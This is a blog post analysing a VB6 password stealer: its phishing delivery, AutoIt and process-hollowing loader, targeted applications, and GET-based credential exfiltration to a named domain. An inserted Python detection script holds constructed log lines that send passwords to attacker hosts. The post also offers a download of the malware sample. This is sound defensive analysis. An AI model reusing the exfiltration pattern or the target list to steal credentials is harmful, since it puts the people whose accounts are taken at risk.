Tuesday, February 24, 2015

Quick analysis of a VisualBasic based Password-Stealer

After the analysis of Golroted I was able to get the key to the attacker's server (actually they gave it to me by embedding it in the code, didn't they?). Using that key I was able to spot an email message that was used in a spear-phishing campaign.
(Screenshot: the spam message)
The email message had an attachment that I am going to analyze in this post.

The attachment was an SFX archive that, once executed, dropped a legitimate AutoIt executable along with three other files.
(Screenshot: the archive content)
The SFX then ran the AutoIt executable with one of the dropped files (an AutoIt script from the same archive) as its argument; that script was responsible for creating a new process (using process hollowing) that ran the actual VB-based malware (you can read some info about it in this Polish CERT post).

The VB malware (Sophos names it Mdrop) is actually a simple Password-Stealer that tries to steal passwords from the following software:

  • Trillian
  • IDM (Internet Download Manager) - usually used to manage passwords for file-sharing web sites (rapidshare.com, uploadable.ch etc.)
  • JDownloader (it does so as seen here)
  • FileZilla
  • Yahoo! Messenger
  • Pidgin
  • MSN
  • VPN settings (saved in rasphone.pbk files)
In addition to the above list, the file carries the well-known WebBrowserPassView and MailPassView tools in its resource section.

The malware itself is simple and boring, but here I had a chance to test my VB reversing skills. Since it is no secret that opening a VB6 binary in IDA is not going to get you far in the analysis, I used VB Decompiler and was able to decompile the binary to a point where I could understand most of its functionality just by looking at the code, as we can see in the CallAPI function for example:

You really don't need more than that in order to find the source code on the web, although for more serious RE, where you need to understand the bits and bytes, it won't be enough.

In order to send the stolen passwords to the server (sab3.netau.net) it uses a simple GET request that contains the application name, username, password and computer name of the victim.
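Because the stealer pushes everything out in a plain GET request, the exfiltration is easy to spot in proxy logs. The following Python script is an added example (not code from the post or from the malware): it runs two heuristics over a few constructed proxy log lines, flagging requests to the domain named above and GET requests whose query string carries both a credential-looking key and a context key (username, application, computer name). The parameter names are an assumption; the post only says which fields the request contains, not how they are named.

```python
from urllib.parse import urlsplit, parse_qs

# Domain named in the post as the drop site for the stolen credentials.
KNOWN_EXFIL_HOSTS = {"sab3.netau.net"}

# Assumed parameter names: the post says the GET carries app name, username,
# password and computer name, but does not give the actual key names.
CREDENTIAL_KEYS = {"pass", "password", "pwd", "pw"}
CONTEXT_KEYS = {"user", "username", "login", "app", "application",
                "pc", "computer", "computername", "host"}

# Constructed proxy log lines (not real traffic), format: "<time> <src_ip> <method> <url>"
SAMPLE_LOG = """\
2015-02-24T10:01:02Z 10.0.0.5 GET http://sab3.netau.net/gate.php?app=FileZilla&user=alice&pass=s3cret&pc=WS-ALICE
2015-02-24T10:01:05Z 10.0.0.5 GET http://www.example.com/index.html
2015-02-24T10:02:10Z 10.0.0.7 GET http://cdn.example.net/static/app.js?v=42
2015-02-24T10:03:11Z 10.0.0.9 GET http://198.51.100.20/log.php?application=Pidgin&login=bob&pwd=hunter2&computer=LAB-09
2015-02-24T10:04:00Z 10.0.0.9 POST http://mail.example.com/login?user=bob
"""


def parse_log_line(line):
    """Split one log line into its four fields; returns None for malformed lines."""
    parts = line.split()
    if len(parts) != 4:
        return None
    ts, src, method, url = parts
    return {"ts": ts, "src": src, "method": method, "url": url}


def classify_request(url, method="GET"):
    """Return the reasons a request looks like credential exfiltration (empty list if none)."""
    reasons = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()

    # Heuristic 1: destination is the drop site named in the analysis.
    if host in KNOWN_EXFIL_HOSTS:
        reasons.append(f"known exfil host {host}")

    # Heuristic 2: credentials travelling in a GET query string, regardless of host.
    if method.upper() == "GET" and parts.query:
        keys = {k.lower() for k in parse_qs(parts.query, keep_blank_values=True)}
        if keys & CREDENTIAL_KEYS and keys & CONTEXT_KEYS:
            reasons.append("credential-style parameters in GET query: "
                           + ", ".join(sorted(keys)))
    return reasons


def find_exfil(log_text):
    """Run both heuristics over every line; returns (src_ip, url, reasons) per hit."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        reasons = classify_request(rec["url"], rec["method"])
        if reasons:
            hits.append((rec["src"], rec["url"], reasons))
    return hits


if __name__ == "__main__":
    for src, url, reasons in find_exfil(SAMPLE_LOG):
        print(f"{src} -> {url}")
        for reason in reasons:
            print("   ", reason)
```

The second heuristic is the more useful one in practice: the drop domain changes from campaign to campaign, while a GET request carrying a password next to a username and a machine name is a pattern this family of copy-paste stealers shares, and it will fire on the constructed line to 198.51.100.20 even though that host is on no list.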

Overall this malware is just copy-paste work from the web and there is nothing new worth mentioning, but for me it was a good exercise in how to deal with an AutoIt-based packer(?) and how to decompile Visual Basic 6 code.

You can download the original SFX archive and the dumped VB based binary from here.
